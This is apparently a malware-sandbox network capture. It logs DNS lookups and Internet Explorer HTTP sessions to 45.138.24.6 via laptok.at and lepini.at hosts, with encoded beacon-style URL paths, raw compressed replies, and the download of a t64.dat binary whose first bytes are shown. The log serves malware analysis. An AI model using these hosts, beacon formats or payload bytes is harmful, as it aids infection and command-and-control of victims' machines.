Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:59.476310015 CET	8.8.8.8	192.168.2.7	0xa9ca	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:09.016892910 CET	8.8.8.8	192.168.2.7	0xdbb8	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:18.082550049 CET	8.8.8.8	192.168.2.7	0x3736	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:51.187516928 CET	8.8.8.8	192.168.2.7	0x1200	No error (0)	c56.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.226835012 CET	8.8.8.8	192.168.2.7	0xc20a	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.227113008 CET	8.8.8.8	192.168.2.7	0xe218	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.817686081 CET	8.8.8.8	192.168.2.7	0xf2bd	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:57.887608051 CET	8.8.8.8	192.168.2.7	0xc753	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:58.597937107 CET	8.8.8.8	192.168.2.7	0x3b1c	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49761	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:44:59.545278072 CET	2523	OUT	GET /api1/fMoOyVtNHyb2CKT5h4Jv/cOtoUxpSs_2B7b6ktW6/8gKDvU8GZHurEn2nukEHAM/mBRpHfezDBeLc/1Val8ISr/ggV1pjQswOiZEbQ3ehKxHJY/mND7st4_2F/zvqzs_2F7uy_2Bb6o/3NqBL4_2BCgu/Eg0dWIbsiNp/OTltsytgATJROU/sIZwRhOMX71zuqhRMKIgV/JJtVE_2FgKvOcqIw/srgqU3CK_2FbRdx/IT_2FypXirSM9LJx6a/KaX7JOhW_/2F_2FH9Scf70TsmxARuA/FJ_2FEzlHBdy_2BM3Si/ebVcIeLFS9doIWImMnNuIk/8e9XWr3pdJVnY/Lc7jY8hP/_2BxFf2skUqywtS/A HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:00.101540089 CET	2532	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:44:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9a c5 72 eb 40 14 05 3f c8 0b 31 2d 25 59 cc 0c 3b 31 33 eb eb 9f f3 96 49 55 54 d6 cc bd e7 74 bb 92 e2 f1 64 55 d2 24 2c 72 76 a2 1b 4c d1 ce b8 72 2a 7c d7 35 c3 f7 0a 3f b5 58 11 ea 49 2a a5 52 7d 1e 0c 5d 9b 7d 4d 22 47 7a 4d 4d 60 27 d9 ce e3 20 22 85 dd de a1 9b eb fb 63 2b 37 4e 83 f6 dd cc eb 42 1e 65 f1 cb be 52 4e 6c 73 20 dd b3 3e b4 00 1a 1f b0 d2 35 29 9f f3 24 75 9a 42 c2 39 33 05 67 64 0b ed 47 96 92 eb 97 1e 6e b7 13 b1 dd 52 67 67 62 58 ad 98 b4 c5 a0 07 6b 53 d9 67 9c 29 87 dd 85 a2 38 4e 76 cb ec 9e 8c c0 a8 45 99 d6 06 24 c7 44 6a 13 6e 27 b1 de bc a4 11 ce 21 56 31 5f 8f 9f 6f bd c5 d1 f2 6a 10 d0 cf ca aa 5a 4b c3 65 f2 98 c9 c2 9a 34 47 25 64 f4 3a 6a df e0 5a d4 ac 82 31 bc 39 74 c2 3e bd d6 0f 7b 7b 62 bf 60 01 35 c9 98 1d 9d 8d 65 2e d0 b5 87 34 41 65 48 ac ce 2e ed 5d a4 8c c6 3d 56 6f 5d ed 79 3c ca 1e af dd 9b 10 03 03 bc a6 95 50 1c a1 8b 14 21 62 96 fa d4 3b 1d 31 bf c1 55 74 0c d9 a5 fc 69 33 ca 74 07 95 53 02 c7 06 0a 70 f6 bc 0e 3a cb 79 95 b6 77 73 89 7d b1 30 06 29 d6 df 0a 71 86 c6 b6 2c 38 74 04 d2 88 68 a6 8a 68 3c 5f 29 41 0a f7 51 11 e8 4e 36 4d 3e 39 63 8d ff f8 4c 0d a8 bc 56 58 80 e2 7c 78 7d 78 36 dd 66 04 1d 10 da a8 81 79 49 98 5e 0c f6 b2 ee e3 e7 98 01 7d 21 0b df a8 ef ce 69 1e eb be 74 e4 2b 8d fb 21 40 7a c1 78 f0 c1 5f 14 39 2a d7 be 6e 86 6b da 88 c5 22 79 cd ca 80 6f b8 d6 00 1a 41 ab 21 69 b3 ce 41 5b e1 26 05 a1 8f 7e 34 0f 01 a6 0a be 67 7c 85 cc 9b 85 ae 9a 57 f9 38 4b 21 cc 06 df 6c 05 6c 6c 01 23 7a 4e 65 9c 61 3b b8 83 20 44 9d ed 0b e1 98 6f 8a 5e f6 88 7c 0c 7d 20 c7 71 3d 09 93 a3 c8 e0 51 81 99 43 0c de 46 f0 23 fa 4d 06 a0 23 84 14 75 75 43 5d 5a ed ca 98 f0 25 14 ed 12 fc 2a 14 14 80 a2 49 45 2e f9 0b e2 4f 4e 6a f6 0f a7 f0 99 26 1f 55 0e 39 05 6d 0d 27 58 28 7b 57 21 4d 1b 8b e0 19 79 22 52 1f 91 1c 58 4d 5e 3e ce 02 c1 dc ed 98 1d 9c 39 f1 12 5f 89 68 6f 39 5c 1c 31 83 6b e5 16 cc dd 17 68 2e 17 88 2e 61 10 9e ef 23 48 af 65 7c 38 d6 c7 13 16 43 1b d4 0e a6 ef 71 e8 4a 12 14 a1 b6 d5 02 28 8b dc a8 d5 62 87 4b e7 0d c7 d8 48 13 a1 6f 76 25 a4 41 f4 cb 7c cd 3d ca f8 50 a8 f0 95 a8 3c ac cb 3e f5 dc 1a da ab a6 d2 17 11 98 c2 78 0a b0 2e ac ab 98 fd 35 91 cb 38 cc b2 43 70 12 61 53 14 ac f0 d3 da 7e 0b 7c 77 fd 11 46 96 d9 42 df ad 1b 66 31 50 73 c4 1f eb 2a d8 d5 8a e3 c4 10 7b 65 26 ab a2 a7 71 1f 76 1d 24 5f ec 56 a6 68 a9 04 4d 2e a0 fe 2a 31 09 f0 2b 49 3d 90 23 0c c6 6f 98 3a 02 a8 38 e3 dc c9 ae 4d 86 f5 ac 6e 4f 6e bf c0 f7 35 0b 89 81 68 4d ff 6a dc d2 37 a0 cd b2 4b 1d bf 29 92 d2 10 f9 65 17 b2 b2 9e 8d 28 d0 2b 60 ef 01 cc df 04 cb 8b 06 d1 6b bc aa 6f 5c b2 b3 aa 76 13 3d 3f 99 fd 4d e1 1d fb 1d 5b 5e 47 41 63 a1 db 18 f0 8a 24 68 00 ca 1e a2 67 19 d5 0d b1 6d f7 6c fc 7d 98 d4 e2 5f b9 81 a8 80 00 b5 97 16 94 13 44 23 e9 79 cc d9 fb e4 57 9d 13 de dc c1 5f 09 e8 ac af 52 2d ea 53 3e 60 b0 1e ef 43 4f 4c 92 d7 a7 0a 2c d3 5b 73 26 e3 a9 8d 8b 9e 97 97 93 aa 03 83 ee 19 84 8d 41 b5 37 72 8a b5 6f 9d 07 29 18 8c 24 3a 8e 6e 9c b0 c0 85 1f 7b be 02 45 69 ea 52 3d aa f4 63 17 7b 64 19 c3 0e 59 69 00 e3 2f f2 c2 4d e6 bf 5e Data Ascii: 2000r@?1-%Y;13IUTtdU$,rvLr\|5?XIR}]}M"GzMM`' "c+7NBeRNls >5)$uB93gdGnRggbXkSg)8NvE$Djn'!V1_ojZKe4G%d:jZ19t>{{b`5e.4AeH.]=Vo]y<P!b;1Uti3tSp:yws}0)q,8thh<_)AQN6M>9cLVX\|x}x6fyI^}!it+!@zx_9nk"yoA!iA[&~4g\|W8K!lll#zNea; Do^\|} q=QCF#M#uuC]Z%IE.ONj&U9m'X({W!My"RXM^>9_ho9\1kh..a#He\|8CqJ(bKHov%A\|=P<>x.58CpaS~\|wFBf1Ps{e&qv$_VhM.1+I=#o:8MnOn5hMj7K)e(+`ko\v=?M[^GAc$hgml}_D#yW_R-S>`COL,[s&A7ro)$:n{EiR=c{dYi/M^

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49762	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:05.002677917 CET	5941	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:05.117295980 CET	5942	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 26 Jan 2021 18:45:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49770	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:09.107569933 CET	6033	OUT	GET /api1/zu_2FE7OgtG1YElZCJHzk/3Z6oZ2v_2FSvhdpl/3dtqOsJj6Y7KZxP/RohYJ_2FHTGS4WhMsK/QG5B0lq_2/BpfIpB91VJE6CEmZQm7M/PQN4vdDkebJ_2BGxKNI/VsKdR_2FzTa6vjFIkSkAZy/r8dnnf58olJ6u/p6WgAtg_/2FXj_2Baw19poatwg_2F2kO/3f5_2FyJS3/nBZ6Nmhf_2FEUX1qE/XHrQlN8gAX37/PR_2Fy_2B_2/BhmNEXvGPQ5mPx/Z35_2F9v0RKzbUs6X6gjG/o6gCLElU7pE_2Bpx/oRgBOdZRxgLD0_2/BNQ4L9i8wZtjCkBFgV/vbRDZhUKm/0qlCcD5z2Gyxth4kqVNJ/dA0aOC4 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:09.734744072 CET	6986	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 ae a4 00 14 05 3f 88 05 6e 4b dc 9d c6 76 b8 bb f3 f5 f3 86 f4 b2 13 e4 ca a9 4a 40 5d 9b 1b 51 d2 4b a6 ea a4 6f 96 5c dc 6e d8 d2 55 36 fd a1 6a f7 e9 45 cb c0 ae c4 2b 6e cc d7 3f 88 8c b9 ce 3e 53 16 cc 1e 7f 63 f7 2e 6a 50 cf f5 d7 32 2c 77 68 d8 e3 12 78 4a 9f 4b e6 f2 ae 1c 4f f1 0b 65 92 4e ce 7b 39 80 35 a8 f6 13 61 7a 6a 97 8d bd f9 f1 58 69 7e 59 31 f4 5e 2d 7c f4 f1 db 0b ab 24 a8 1b 1a bc ac ee 38 fb 92 44 44 34 42 5e ca 36 85 bd 99 7e 89 37 05 72 f4 0c 6c 98 7b 36 4e d7 1e 23 58 ad d6 c1 a5 62 a7 76 21 8e b4 df 7c 6e 38 d8 90 89 c6 c0 24 7a 9b ba 64 ec 4e bb d5 4d 9f 25 5b 59 3e 9b ec 30 ae 24 71 04 b8 5b 61 8a cc 3a 34 f0 83 dd 6e 4a 76 c3 9c e6 75 24 73 24 f9 28 16 e2 6b c0 5c c5 5a 4a cf 30 a4 03 63 f8 3d f9 51 53 9b 35 40 da 3d 26 fd f5 75 85 02 a0 e5 09 40 5d bd 56 87 45 74 81 bd b3 33 7f 3f d2 af bb 0f 74 ae 56 bc 2c 4b 30 02 56 0c d6 6e 99 4e ab 90 3b a0 11 e2 da 62 8e 2f 45 52 c4 da 90 aa 26 9e 5a d7 33 6b 4f ad 68 24 4f 70 5c d3 56 18 af 2c 92 2b ce c5 60 61 a5 6c a3 fc 57 da 28 7d 0d e4 35 c0 29 76 39 46 09 d6 bc 53 24 73 92 b7 74 93 f1 61 bb 30 a7 a4 89 cf 83 6e f1 c3 94 0b d5 ac c1 10 00 da 8f ad 26 34 0a 35 b7 8a f2 1d b4 a1 3a 09 75 d1 99 55 3a 6d 40 df 60 65 eb 0d 22 12 02 7b f9 42 e9 96 69 a5 1a 43 ce 42 8e c8 a3 dc 6a 6f 6c 2b 11 5b 3c 07 d5 25 ef 9e da 30 9b 49 2a e0 52 d2 f2 7d 25 97 16 6e 25 12 b3 93 48 1c fe e5 8a f7 e4 e1 26 05 49 4c 88 dc 11 54 a1 bf 56 89 9d 9d c9 cf 92 03 c8 1d fd fa 7d aa 6d e2 79 d1 af ed e3 0d cf 8f 09 35 3a 5d ed 60 8d 00 89 7f a7 7e 1c 65 df f2 a9 ad a5 d9 66 ad b8 7d 17 72 54 2d 5f cb 7c 5f 5a 21 dc cb 3f 62 77 f6 39 aa 2c c3 9f 74 fe b0 cc 0d 45 08 d5 ed 5f 0e de e0 71 38 b5 b8 dc 35 22 5c bd eb a6 fa 72 82 01 62 13 76 ab ef ae b5 4b 39 5f 1b bb 29 03 7c 8e c8 cb cf c8 24 fd c8 18 1c e8 d0 83 16 c6 7b d9 b3 48 8a 79 d4 50 d9 d1 cd a2 a3 f7 8a f9 60 38 7a 41 60 1a 9f 59 4d 61 65 d1 52 b3 5a 51 16 1e 2d 13 c1 c3 e5 56 8a cd a2 70 85 1f fb 3e f5 67 3a 02 e3 67 88 1c 31 e2 f2 42 b9 55 b3 29 66 77 d3 7a 38 1d 5c d0 9d 77 7e ef d5 26 06 f4 96 e2 a5 87 be 2d 7b dd 77 e3 ca b7 a1 97 cc bd 30 ac 2f d3 6b 7c ce e8 ea d9 ab ed 02 39 e0 da fa 74 8d bb 94 b4 e5 00 aa c2 84 bb 28 ce 71 1d f7 81 e0 13 bc 37 bb 23 15 85 6b 9f 0d b1 3f f4 2f 3e c0 20 5c cd 02 16 e6 a1 33 5a 07 d0 fc 42 49 67 62 34 f3 eb a7 80 01 df d1 b5 98 fa d9 9d 52 a8 54 d2 87 5e 7f e4 72 fb bd 01 5a 1b cf 75 e7 5c b2 00 75 2c 74 f4 be 5b fd 9e f9 7c dc 83 0f 19 8d 3f 5a cd 9e 3a c7 a1 7a 7a bf 13 e1 28 cd 8c df 36 74 31 b9 a3 bf ea 4d 00 d6 4c ef 53 6d 01 27 30 ca 6b 7e e8 9a 59 ce 57 76 b3 ce 47 70 54 dd bb 4b d5 ee 3e c7 97 a2 39 80 b6 30 55 cd a3 7f 67 74 5e 0a d9 54 21 9b 63 40 f2 d7 01 f9 55 61 f3 80 7c e5 aa 7b b5 d4 97 b9 94 48 48 71 dc c8 01 e5 a9 6f 76 62 e8 47 75 5b 0b 6e 6a d7 3a 04 d6 f0 fe c1 91 58 42 a2 26 35 db 7a 94 bc 31 08 14 8e 80 73 0b c1 5a 0f 37 c5 c5 4f 44 1c dd 56 69 7e 64 fb 21 2e 4f 3d 2a 8e 70 73 ca d4 50 76 3d 04 c6 d1 4a e1 63 5e 7e ff 62 f1 d2 fe fa 8f 56 49 f5 be 44 52 c1 62 36 e8 59 f4 9c 37 b7 eb 65 02 15 9d c9 ef ae 5f 72 0e d7 66 89 1d 4a 4b 71 Data Ascii: 2000?nKvJ@]QKo\nU6jE+n?>Sc.jP2,whxJKOeN{95azjXi~Y1^-\|$8DD4B^6~7rl{6N#Xbv!\|n8$zdNM%[Y>0$q[a:4nJvu$s$(k\ZJ0c=QS5@=&u@]VEt3?tV,K0VnN;b/ER&Z3kOh$Op\V,+`alW(}5)v9FS$sta0n&45:uU:m@`e"{BiCBjol+[<%0IR}%n%H&ILTV}my5:]`~ef}rT-_\|_Z!?bw9,tE_q85"\rbvK9_)\|${HyP`8zA`YMaeRZQ-Vp>g:g1BU)fwz8\w~&-{w0/k\|9t(q7#k?/> \3ZBIgb4RT^rZu\u,t[\|?Z:zz(6t1MLSm'0k~YWvGpTK>90Ugt^T!c@Ua\|{HHqovbGu[nj:XB&5z1sZ7ODVi~d!.O=psPv=Jc^~bVIDRb6Y7e_rfJKq

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49769	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:15.151518106 CET	10304	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:15.268407106 CET	10371	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 26 Jan 2021 18:45:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49781	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:18.147516012 CET	11306	OUT	GET /api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yEv/uYPkaiYomq7al/rA1mR_2F/ERR1VtnRVC9Z9L97Yj0nEFv/RXcdmcZw3t/09S9mQ4TEGPoFg0wu/CB1TTO3K_2Fx/ES759oV_2F3/AqQYGPBuqK6lVx/HnWardAtMd40kxzRqiZ4c/ezlyaUtSbXNYPJd5/jFNmBUf7ol4D5iv/PAhhoqRwskHN_2BfyW/Qy04blpWl/1eFKv0iNVI2O85WUZxuE/12FPAo3Lux39x5EugSB/ZIqsnBNs_2B_2BTY3S2vKa/rTxfhO8bj/vDrid7bT/A HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:18.537538052 CET	11309	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 94 b5 b6 ed 08 0c 43 3f 28 45 98 8a 57 84 99 73 42 5d 98 99 f3 f5 73 a7 71 a3 c2 4b b2 b5 d5 52 02 a9 db 6f de 81 13 26 0c e0 94 1f 94 7b 07 90 a2 99 50 8f e7 97 dd 0a be 7a ee 60 38 3a 2e 69 79 b2 76 dc da e7 d9 9c 19 8d 2c f7 bb 89 f1 99 36 29 2d 16 3d fd 95 35 9e 2c 7f 0a 7d ed f1 36 7e 9f 8e 63 5a f4 9a 68 80 87 9d 8c 9f be 38 d5 bb 91 4d 58 0d 03 b9 3c fa 9b e7 f1 ca 73 17 86 ce 00 ef 43 4a 3f e5 97 e5 b1 23 76 69 57 18 02 bb e1 40 70 02 a6 c7 4e f7 60 89 e3 b6 01 42 0a 19 84 ee 24 a0 89 d1 03 49 15 a8 e4 21 70 ad b8 bc d1 66 91 c9 69 c0 60 2b ba ed f9 28 b3 3b 64 98 ac c4 53 d4 5a 3a 1a b0 9a ce 0b 85 da 6c 85 37 08 5f 93 a6 39 d9 c9 40 29 44 0b 31 90 19 94 8d 16 8f f4 66 89 b1 94 1d 84 bf 44 86 d4 32 53 bd 19 20 38 0c 8a 67 89 ed b2 e7 e8 50 a0 29 c8 7d ca 6e 76 11 4b 9a bf a0 15 3e a7 08 6a d4 0f e0 79 05 7b 6c e2 65 83 52 79 b5 91 13 b4 66 ec 67 a1 1a 0c 83 c3 df 16 b6 e9 5c 95 a5 68 32 27 b0 14 3f d3 21 00 4a de fa 4e f4 c6 b8 fb 68 d4 43 bb 32 f3 fa 47 8b a5 69 54 c6 e7 6f 41 9e 0d 71 b8 f2 1a fb 3a 45 1e 61 78 68 73 ae c1 09 c2 84 3f e4 dd bf 15 a6 fa 2c 85 d3 93 51 93 a5 6a 0f 50 47 84 fa 6b 26 cd 51 44 aa 40 68 8c 20 54 8c 34 a3 65 67 d8 b2 58 b2 63 e6 e7 4b de 9b bc 89 c4 ea 69 c7 33 95 b4 00 1a 84 1d 93 ad d5 af 0b 82 8b a6 4c 3a b4 38 d5 64 b7 89 3d 08 92 de 9d 74 b0 ba 18 01 1d c7 0b e2 f3 04 ae 2f 5a a4 15 a2 e0 ca ca 26 f4 e7 2e 83 96 ce 86 3a 04 fc a2 2c 22 0f 53 56 3f 4e bd 8c 60 0a 57 00 6c 4f e8 08 19 94 51 c6 8a 97 9d 6a fd ee 73 91 15 24 0d 63 68 6b b2 ab d0 a2 09 a4 60 36 d7 4b e1 65 0e 57 6b ff 53 a6 59 47 04 32 d8 f8 db de 6c 9a 13 7b 53 23 e6 00 13 6a e3 e9 85 33 bc 2a a1 5f 8a a6 d5 1e b4 31 cb b1 98 2b ca 91 6e 9c 81 c1 22 fd f3 37 62 ef 26 2a 77 93 bb bb 60 0e f9 ee 61 99 3c d4 9b 14 5c 42 58 45 63 55 d2 35 2d 8c d9 33 01 6f d8 a0 28 b7 24 09 2a 13 b2 4c aa 48 b3 ef 23 f8 51 64 a5 cb ce 90 8c 7e 9d 76 3a ff a5 86 97 d3 7e 73 64 4a 0e b8 3a 12 db 3f b7 9f 6e ed c8 9f 42 d6 e7 0a c3 2f 1e d3 fd 8e 9b f1 6c 72 43 e6 50 9d 97 be 51 9c d0 03 9c 20 1d 6c 71 f7 ac 03 ee 77 97 1f bb d5 92 38 19 b9 bf 1b b6 f7 b9 f6 e4 88 b8 c5 c2 3d 1e 46 fd d8 de 78 52 f6 8d 96 47 de 4b 38 5f c7 40 07 55 f7 04 a4 1d 28 9b 9e 78 1f 81 75 1b 89 06 7f bd d9 32 86 6c 8f e8 b4 dc 4f 57 30 11 09 00 6c 50 f9 9f db 73 67 2a c1 4b 0a 84 82 cc 23 bb 3f 80 54 ef 16 0a 78 6a 7a 7f 7a 43 a5 2a 69 39 98 c0 fb 4a 9a c6 4b 9a df 62 cb ca 29 a3 06 52 6f 2b f4 46 68 91 f6 7e 66 ce ca 87 17 07 d5 af 68 bb 42 2c 4a 68 a0 d4 cc 95 03 34 9e d8 af 53 df 4c d9 f5 fa c5 22 f0 cc df 42 8a 5d d6 c1 d2 f2 ad 8d 82 01 f6 00 a4 e5 71 df 52 03 6b a0 c0 a7 3f 36 0b 2e f6 ad 64 7a af ff a6 90 92 9e 5d 8c 57 03 4a 75 92 a8 92 15 18 87 23 f8 80 d5 86 b7 a0 19 fb f7 ec ac 54 3e 3c a8 b0 94 19 42 69 d0 f5 79 55 2a fb f6 40 ce 4d a0 22 02 a5 94 64 12 1d b5 da 10 c3 5d d7 45 1c 2d df 5c 84 1e 31 d0 7e 94 b2 ec f8 5e cf 18 bb d4 72 e3 13 fb 24 29 9f e2 6b 46 d2 60 54 cf d8 f0 42 41 a5 19 76 93 0d d8 34 07 bd af 2a c4 15 95 15 40 10 1d 07 d6 f7 f3 65 01 f2 7b 4f ac 22 d9 c1 12 9d 73 2d a9 41 23 cd 75 25 2b e0 fd e5 a3 38 36 a9 85 4d f0 Data Ascii: 762C?(EWsB]sqKRo&{Pz`8:.iyv,6)-=5,}6~cZh8MX<sCJ?#viW@pN`B$I!pfi`+(;dSZ:l7_9@)D1fD2S 8gP)}nvK>jy{leRyfg\h2'?!JNhC2GiToAq:Eaxhs?,QjPGk&QD@h T4egXcKi3L:8d=t/Z&.:,"SV?N`WlOQjs$chk`6KeWkSYG2l{S#j3_1+n"7b&w`a<\BXEcU5-3o($LH#Qd~v:~sdJ:?nB/lrCPQ lqw8=FxRGK8_@U(xu2lOW0lPsgK#?TxjzzCi9JKb)Ro+Fh~fhB,Jh4SL"B]qRk?6.dz]WJu#T><BiyU@M"d]E-\1~^r$)kF`TBAv4*@e{O"s-A#u%+86M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49785	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:51.249437094 CET	11570	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Jan 26, 2021 19:45:51.553972006 CET	11580	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:51 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af 